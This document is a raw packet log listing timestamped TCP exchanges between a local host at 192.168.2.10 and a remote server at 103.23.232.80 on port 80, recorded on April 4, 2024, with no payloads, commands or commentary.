Apr 4, 2024 17:49:07.561553001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561598063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561610937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561613083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561635017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561639071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561650991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561672926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561676979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561690092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561712027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561712980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561728001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561749935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561755896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561783075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561786890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561800957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561819077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561834097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561836004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561861992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561888933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561893940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561903954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561918020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561928988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561942101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561959982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561964989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562026024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562057018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562062979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562076092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562088966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562104940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562119007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562122107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562158108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562171936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562190056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562191963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562215090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562239885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562249899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562302113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562320948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562359095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562366962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562402964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562413931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562427044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562452078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562464952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562465906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562478065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562491894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562495947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562505960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562519073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562541962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562551022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562582970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562586069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562608957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562614918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562642097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562643051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562675953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562681913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562724113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562747955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562761068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562767982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562788010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562794924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562818050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562833071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562843084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562848091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562875032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562875986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562890053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562907934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562912941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.562923908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562947989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.562978029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563004971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563040018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563045979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563060045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563082933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563083887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563102961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563117981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563141108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563153028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563164949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563173056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563189030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563204050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563213110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563235998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563251972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563266993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563270092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563313961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563328028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563350916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563374043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563380003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563431025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563432932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563446045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563467026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563469887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563482046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563484907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563503981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563519001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563539982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563565016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563575983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563597918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563627005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563663960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563668013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563700914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563707113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563743114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563751936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563765049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563776016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563787937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563790083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563819885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563824892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563833952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563848972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563859940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563884974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563893080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563915014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.563961983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563976049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563988924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.563992977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564007998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564018965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564023972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564033031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564053059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564059019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564068079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564086914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564095020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564127922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564146042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564158916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564172029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564182043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564201117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564212084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564237118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564249992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564263105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564275026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564275980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564296961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564318895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564336061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564349890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564362049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564373016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564385891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564393044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564408064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564428091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564439058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564441919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564455032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564466953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564491987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564503908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564517975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564529896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564551115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564553976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564564943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564590931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564590931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564604998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564626932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564645052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564647913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564682007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564711094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564743996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564744949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564758062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564800978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564806938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564809084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564824104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564852953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564893961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564908028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564924955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564945936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.564974070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.564975023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565006018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565035105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565047979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565068960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565073013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565088034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565088987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565107107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565121889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565121889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565135956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565149069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565167904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565191984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565203905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565215111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565227985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565238953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565244913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565272093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565279007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565290928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565308094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565315008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565325022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565329075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565346956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565361977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565361977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565382004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565399885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565423965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565438032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565450907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565468073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565476894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565486908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565489054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565501928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565505028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565521002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565537930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565546036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565558910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565574884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565591097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565623045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565634966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565648079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565663099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565668106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565685987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565692902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565706968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565720081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565725088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565748930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565763950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565788031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565851927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565885067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565888882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565920115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565932989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.565952063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565968990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.565969944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566035986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566049099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566061020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566070080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566092014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566134930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566148043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566159964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566173077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566179037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566186905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566195965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566229105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566237926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566243887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566263914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566284895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566292048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566303968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566318989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566375017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566387892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566391945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566401005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566412926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566414118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566426992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566437006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566461086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566494942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566508055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566519022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566529989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566540003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566555023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566569090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566576958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566581964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566606045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566627026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566643953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566658974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566694021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566695929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566710949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566724062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566725969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566747904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566750050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566778898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566792965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566845894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566854954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566899061 CEST	80	49730	103.23.232.80	192.168.2.10
